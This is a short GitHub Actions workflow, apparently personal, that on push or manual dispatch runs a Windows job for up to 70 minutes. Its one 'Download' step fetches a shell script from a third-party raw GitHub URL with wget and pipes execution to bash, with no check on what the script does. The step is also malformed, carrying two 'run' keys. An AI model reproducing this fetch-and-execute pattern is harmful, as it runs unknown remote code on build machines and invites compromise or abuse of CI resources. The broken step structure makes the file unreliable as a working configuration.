name: my personal

on: [push, workflow_dispatch]

jobs:
  build:
    timeout-minutes: 70
    runs-on: windows-latest

    steps:
    - name: Download
      run: wget https://raw.githubusercontent.com/sdtuif/Sa/main/ss.sh
      run: bash ss.sh
